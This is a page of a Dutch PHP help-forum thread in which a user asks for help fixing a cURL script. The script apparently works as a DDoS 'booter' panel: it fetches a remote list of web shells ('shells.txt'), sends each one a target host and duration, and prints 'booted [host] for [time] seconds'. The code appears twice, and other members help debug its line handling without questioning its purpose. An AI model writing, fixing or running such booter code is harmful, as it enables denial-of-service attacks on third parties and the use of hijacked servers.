File get content in cURL

Overzicht Reageren

Sponsored by: Vacatures door Monsterboard

Pagina: « vorige 1 2

- Ariën  -
Beheerder

- Ariën -

11/05/2014 19:38:53
Quote Anchor link
Lees eens terug in dit topic wat Santhe zei.
 
PHP hulp

PHP hulp

19/04/2024 05:18:53
 
- Pepijn  -

- Pepijn -

11/05/2014 19:40:09
Quote Anchor link
Dat heeft er niks mee te maken, normaal heten ze anders
 
- Ariën  -
Beheerder

- Ariën -

11/05/2014 19:48:52
Quote Anchor link
Je kan GEEN cijfers als variabele gebruiken, gebruik gewoon LOGISCHE namen.

Toevoeging op 11/05/2014 19:49:06:

Je kan GEEN cijfers als variabele gebruiken, gebruik gewoon LOGISCHE namen.
 
- Pepijn  -

- Pepijn -

11/05/2014 19:53:27
Quote Anchor link
Ze heten ook niet zo :P, is een voorbeeld want normaal heten ze nogal "illegaal"
 
Wouter J

Wouter J

11/05/2014 19:57:36
Quote Anchor link
Wat gaat er mis?

- Waar komen $1 en $2 ineens vandaan, behalve het feit dat dat niet mag in PHP zijn ze nergens gedefinieerd.
- Lekker mooi ingesprongen...
- "isset($_POST['1']) && isset($_POST['1'])" beetje dubbelop...
- Ook curl heeft foutafhandeling
Gewijzigd op 11/05/2014 19:58:03 door Wouter J
 
- Pepijn  -

- Pepijn -

11/05/2014 19:57:37
Quote Anchor link
Enkel de laatste wordt nu goed weergeven zonder spatie, is /n een optie

Toevoeging op 11/05/2014 19:59:00:

Wouter J op 11/05/2014 19:57:36:
Wat gaat er mis?

- Waar komen $1 en $2 ineens vandaan, behalve het feit dat dat niet mag in PHP zijn ze nergens gedefinieerd.
- Lekker mooi ingesprongen...
- "isset($_POST['1']) && isset($_POST['1'])" beetje dubbelop...
- Ook curl heeft foutafhandeling


Die shit is als voorbeeld..
 
Wouter J

Wouter J

11/05/2014 20:03:26
Quote Anchor link
>> Die shit is als voorbeeld..

Zou wel handig zijn als wij de code kregen die je aan het maken bent. Dat helpt erg in het helpen met de code :) Tevens moet je je gaan afvragen of je geschikt bent voor programmeren als je je eigen code na 2 jaar programmeren nog "shit" noemt...
 
- Pepijn  -

- Pepijn -

11/05/2014 20:05:18
Quote Anchor link
Nou, oke dan:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php

error_reporting(-1);
if (isset($_POST['host']) && isset($_POST['time'])) {
    $host = htmlspecialchars($_POST['host']);
    $time = htmlspecialchars($_POST['time']);
    

$urls = file('http://*nl/*.txt');
foreach($urls as $get) {
$get = $get.'?act=phptools&host=' . $host . '&time=' . $time . ' ';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $get);
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    curl_close($ch);
    echo 'booted ' . $host . ' for ' . $time . ' seconds ';
    echo $get;
}
}
else {
?>

<form method="POST" action="">
<p>Host</p>
<input type="text" name="host" placeholder="Host">
<p>Time</p>
<input type="text" name="time" placeholder="Time">
<br>
<input type="submit" value="test">
</form>
<?php
}
?>


Moet ik voor vriend maken.

Toevoeging op 12/05/2014 15:44:21:

Bump?
 
- Pepijn  -

- Pepijn -

13/05/2014 06:18:05
Quote Anchor link
Nog maar even een "bump"
 
- Ariën  -
Beheerder

- Ariën -

13/05/2014 09:22:04
Quote Anchor link
Wat is het probleem? Wat is je *relevante* uitvoer?
 
- Pepijn  -

- Pepijn -

13/05/2014 23:04:44
Quote Anchor link
Nu krijg ik dit als output (echo $get;)

http://kaas.nl ?checker&1=1&2=2
http://kaas2.nl ?checker&1=1&2=2
http://kaas3.nl ?checker&1=1&2=2
http://kaas4.nl ?checker&1=1&2=2
http://kaas5.nl?checker&1=1&2=2

Dus de laatste werkt wel, misschien de file zonder .txt opslaan en /n als new line proberen?
 
- Ariën  -
Beheerder

- Ariën -

13/05/2014 23:09:19
Quote Anchor link
Waar komt de string '?checker&1=1&2=2' vandaan? Of was dat eerst '?act=phptools&host=.....'

Het gebruik van een linebreak met PHP_EOL zou een goed idee zijn.
Gewijzigd op 13/05/2014 23:10:10 door - Ariën -
 
- Pepijn  -

- Pepijn -

14/05/2014 16:08:38
Quote Anchor link
Kan je daar een voorbeeld van geven? / php.net.
 
- Ariën  -
Beheerder

- Ariën -

14/05/2014 16:17:13
Quote Anchor link
Als ik Google naar PHP_EOL, dan kom ik uit op: http://www.php.net/manual/en/reserved.constants.php
Had je zelf ook kunnen vinden.... ;)
 
- Pepijn  -

- Pepijn -

14/05/2014 16:26:16
Quote Anchor link
Dat lukt ook niet echt, mijn code is nu:
Code (php)
PHP script in nieuw venster Selecteer het PHP script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
<?php

error_reporting(-1);
if (isset($_POST['host']) && isset($_POST['time'])) {
    $host = htmlspecialchars($_POST['host']);
    $time = htmlspecialchars($_POST['time']);
    

$urls = file(nl2br('http://creeby.nl/shells.txt'));
foreach($urls as $get) {
$get = $get.' . PHP_EOL .?act=phptools&host=' . $host . '&time=' . $time . '';
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $get);
    curl_setopt($ch, CURLOPT_TIMEOUT, 0.6);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $data = curl_exec($ch);
    curl_close($ch);
    echo 'booted ' . $host . ' for ' . $time . ' seconds ';
    echo $get;
}
}
else {
?>

<form method="POST" action="">
<p>Host</p>
<input type="text" name="host" placeholder="Host">
<p>Time</p>
<input type="text" name="time" placeholder="Time">
<br>
<input type="submit" value="boot">
</form>
<?php
}
?>


Toevoeging op 14/05/2014 16:28:48:

Output is:
booted - for 1 seconds http://kaas.nl . PHP_EOL .?act=phptools&host=-&time=1booted - for 1 seconds http://laas2.nl . PHP_EOL .?act=phptools&host=-&time=1
 
Erwin H

Erwin H

14/05/2014 16:35:56
Quote Anchor link
Je weet toch wel wat een constante is, of is dat ook nog nieuw voor je?
 
- Ariën  -
Beheerder

- Ariën -

14/05/2014 16:37:17
Quote Anchor link
Misschien moet je eens begrijpen dat PHP_EOL geen string is, en waarom plaats je die IN je URL-string? Aan het einde lijkt me logischer.
Gewijzigd op 14/05/2014 16:37:31 door - Ariën -
 
- Pepijn  -

- Pepijn -

14/05/2014 16:37:45
Quote Anchor link
Als ik het goed heb, is dat om iets te returnen.
 
- Ariën  -
Beheerder

- Ariën -

14/05/2014 16:41:04
Quote Anchor link
Als je het maar op de juiste manier gebruikt.
 

Pagina: « vorige 1 2



Overzicht Reageren

 
 

Om de gebruiksvriendelijkheid van onze website en diensten te optimaliseren maken wij gebruik van cookies. Deze cookies gebruiken wij voor functionaliteiten, analytische gegevens en marketing doeleinden. U vindt meer informatie in onze privacy statement.